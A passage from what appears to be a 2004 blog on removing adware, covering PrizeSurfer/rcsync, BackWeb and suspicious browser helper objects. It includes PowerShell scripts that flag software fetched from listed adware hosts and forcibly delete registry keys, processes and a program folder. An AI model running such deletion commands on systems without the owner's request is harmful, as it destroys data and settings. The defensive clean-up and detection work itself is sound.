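$suspectHosts = 'dst.trafficsyndicate.com', 'www2.sznews.com'

function Test-Suspect {
    param($Entry)
    # Unsigned, invalid or missing files are suspect, as is anything fetched from a listed host.
    if ($Entry.Signature -ne 'Valid') { return $true }
    foreach ($h in $suspectHosts) {
        if ($Entry.Origin -and $Entry.Origin -like "*://$h/*") { return $true }
    }
    return $false
}

@(Get-BrowserHelperObject) + @(Get-DownloadedProgramFile) |
    Select-Object Source, Clsid, File, Origin, Signature, @{ n = 'Suspect'; e = { Test-Suspect $_ } } |
    Sort-Object Suspect -Descending |
    Format-Table -AutoSize
```

Nothing here deletes anything. The point is to get a CLSID, a file path and an origin URL side by side: a "Downloaded Program Files" entry whose file is gone (like the "damaged" trafficsyndicate.com entry in the post) is inert, and the BHO list is where a hijacker that survives that deletion will usually turn up.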

Posted by torque at 12:27 AM | Comments (4) | TrackBack

June 5, 2004

Prizesurfer (prizesurfer.exe, rcsync.exe)

If you are experiencing strange pop-up ads, seemingly unaffected by pop-up blockers, you might have Prizesurfer installed on your computer. Fortunately, you can detect it simply by looking at processes using Windows Task Manager. Along with prizesurfer.exe, you might also see rcsync.exe. According to liutilities, it "allows users to win cash and prizes just for surfing the Internet and shopping online". I suspect the only prizes you are going to win are ads on your computer.

[Screenshot: wtm_prizesurfer.PNG]

I suspect that this might be the cause of the pop-up ads from www.featured-results.com. To replicate the behavior, do a search on Google for something like "mesothelioma". A full-page pop-up will pop up and will look like this:

[Screenshot: featured-results.PNG]

Do not click on the ads! We don't want to enrich these guys any more. Go ahead and kill rcsync.exe and prizesurfer.exe from the Windows Task Manager by right-clicking and selecting "End Process". Now, try the Google search again. Shoot, it still does it. So scratch that. The featured-results thing is another problem. To finish up rcsync and prizesurfer, per PestPatrol, go to the Start button, select Run, and then type regedit. Browse to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and you'll see the following:

[Screenshot: prizesurfer_regedit.PNG]

Notice PrizeSurfer and RCSync. Now we could do the kill ourselves, but it turns out, conveniently, that the developers of PrizeSurfer, Pink Sands Media Group, offer an uninstaller (gee, I wonder what else it installs...). But, the link they give, http://www.prizesurfer.com/prkzesurfer_uninstall.zip, conveniently doesn't work - and may even cause your computer to hang. So, moving on, delete the two registry entries and then reboot.

I was unable to locate passkey.dll to unregister (it was gone), nor was I able to find the first five HKEY_CLASSES_ROOT entries. It may be that Spybot already removed these.

HKEY_CLASSES_ROOT\clsid\{7b91df1f-96e8-42ba-ab39-e1db9ce9f371}
HKEY_CLASSES_ROOT\interface\{6d846abd-9ece-44ad-bb1b-e1b0b20e352f}
HKEY_CLASSES_ROOT\passkey.validate
HKEY_CLASSES_ROOT\passkey.validate.1
HKEY_CLASSES_ROOT\typelib\{be055af3-6567-4678-a901-d4b7d92e55fe}
HKEY_LOCAL_MACHINE\software\microsoft\code store database\distribution units\{7b91df1f-96e8-42ba-ab39-e1db9ce9f371}
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\moduleusage\c:/windows/downloaded program files/passkey.dll
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\prizesurfer
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\rcsync
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\shareddlls\c:\windows\downloaded program files\passkey.dll

All clear. Finally, erase everything in C:/Program Files/RCPrograms. Done.
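The steps above (end the two processes, delete the two Run values, delete the COM and Code Store keys, erase the folder, reboot) can be done in one pass. The script below is an added example, not from the original post or from PestPatrol; every process name, registry key and folder in it is the one listed on this page. It assumes Windows PowerShell 5.1 or later, run elevated, saved as a .ps1 and called with -WhatIf first so you can see what would be removed before anything is. HKEY_CLASSES_ROOT has no drive in PowerShell by default, so one is created; the ModuleUsage subkey is handled through the .NET registry API because its name contains forward slashes, which the registry provider would read as path separators.

```powershell
# Added example (not from the original post): PrizeSurfer / RCSync clean-up
# as one script. Run as:  .\Remove-PrizeSurfer.ps1 -WhatIf   before the real run.
[CmdletBinding(SupportsShouldProcess = $true)]
param()

# Names, keys and folder exactly as listed in the post.
$processNames   = 'prizesurfer', 'rcsync'
$runKey         = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$runValues      = 'PrizeSurfer', 'RCSync'
$classKeys      = @(
    'HKCR:\CLSID\{7b91df1f-96e8-42ba-ab39-e1db9ce9f371}'
    'HKCR:\Interface\{6d846abd-9ece-44ad-bb1b-e1b0b20e352f}'
    'HKCR:\passkey.validate'
    'HKCR:\passkey.validate.1'
    'HKCR:\TypeLib\{be055af3-6567-4678-a901-d4b7d92e55fe}'
    'HKLM:\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{7b91df1f-96e8-42ba-ab39-e1db9ce9f371}'
)
$sharedDllKey   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs'
$sharedDllValue = 'c:\windows\downloaded program files\passkey.dll'
$moduleUsageSub = 'c:/windows/downloaded program files/passkey.dll'
$folder         = 'C:\Program Files\RCPrograms'

# PowerShell ships with HKLM: and HKCU: only; map HKEY_CLASSES_ROOT as HKCR:.
if (-not (Get-PSDrive -Name HKCR -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
}

# 1. Task Manager "End Process" for both executables (no error if they are not running).
Get-Process -Name $processNames -ErrorAction SilentlyContinue | Stop-Process -Force

# 2. Show the Run entries (what the regedit screenshot showed), then remove them.
Get-ItemProperty -Path $runKey | Select-Object $runValues | Format-List
foreach ($name in $runValues) {
    if (Get-ItemProperty -Path $runKey -Name $name -ErrorAction SilentlyContinue) {
        Remove-ItemProperty -Path $runKey -Name $name
    } else {
        Write-Verbose "Run value not present: $name"
    }
}

# 3. COM registration and Code Store entries; absent ones (as in the post, where
#    Spybot had already removed some) are simply reported.
foreach ($key in $classKeys) {
    if (Test-Path -LiteralPath $key) { Remove-Item -LiteralPath $key -Recurse }
    else { Write-Verbose "Key not present: $key" }
}
if (Get-ItemProperty -Path $sharedDllKey -Name $sharedDllValue -ErrorAction SilentlyContinue) {
    Remove-ItemProperty -Path $sharedDllKey -Name $sharedDllValue
}
# ModuleUsage subkey names contain '/', which the registry provider treats as a
# separator, so go through .NET, where only '\' separates key names.
$mu = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
    'SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage', $true)
if ($mu -and ($mu.GetSubKeyNames() -contains $moduleUsageSub) -and
    $PSCmdlet.ShouldProcess($moduleUsageSub, 'Remove ModuleUsage subkey')) {
    $mu.DeleteSubKeyTree($moduleUsageSub, $false)
}

# 4. The program folder. Reboot afterwards, then re-check Task Manager and the Run key.
if (Test-Path -LiteralPath $folder) { Remove-Item -LiteralPath $folder -Recurse -Force }
```

Because the script declares SupportsShouldProcess, -WhatIf flows into Stop-Process, Remove-Item and Remove-ItemProperty automatically; only the .NET call needs the explicit ShouldProcess check. Add -Verbose to see which of the listed entries were already gone.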

Posted by torque at 11:42 PM | Comments (0) | TrackBack

Logitech and BackWeb Lite

You can add Logitech to your list of sorta sketchy companies. Along with their so-called "free" desktop messenger comes BackWeb Lite. Spybot caught this on my father-in-law's PC. Despite multiple attempts at fixing the problem, BackWeb kept cropping up scan after scan. Per PestPatrol,

BackWeb is a generic, background downloading tool that software vendors can incorporate into their product to download data (e.g. product updates) to the user's PC. Its operation depends on the instructions given to it by the individual software vendor who bundles it.
You can imagine this being used for good and evil. It could be used for upgrading the mouse driver on the fly, for example, or sending you advertising on your screen, browser, screensaver.

According to Backweb,

BackWeb's technology allows software upgrades and product promotions to be seamlessly delivered and downloaded to Logitech customers using BackWeb's patented Polite communications technology, which avoids disrupting the user by downloading content in the background during network idle time. Since upgrades are now delivered directly to the end-user, Logitech can enhance the customer experience and reduce service costs and time to market. (emphasis added).
You can find the culprit at C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe.

Posted by torque at 11:11 PM | Comments (26) | TrackBack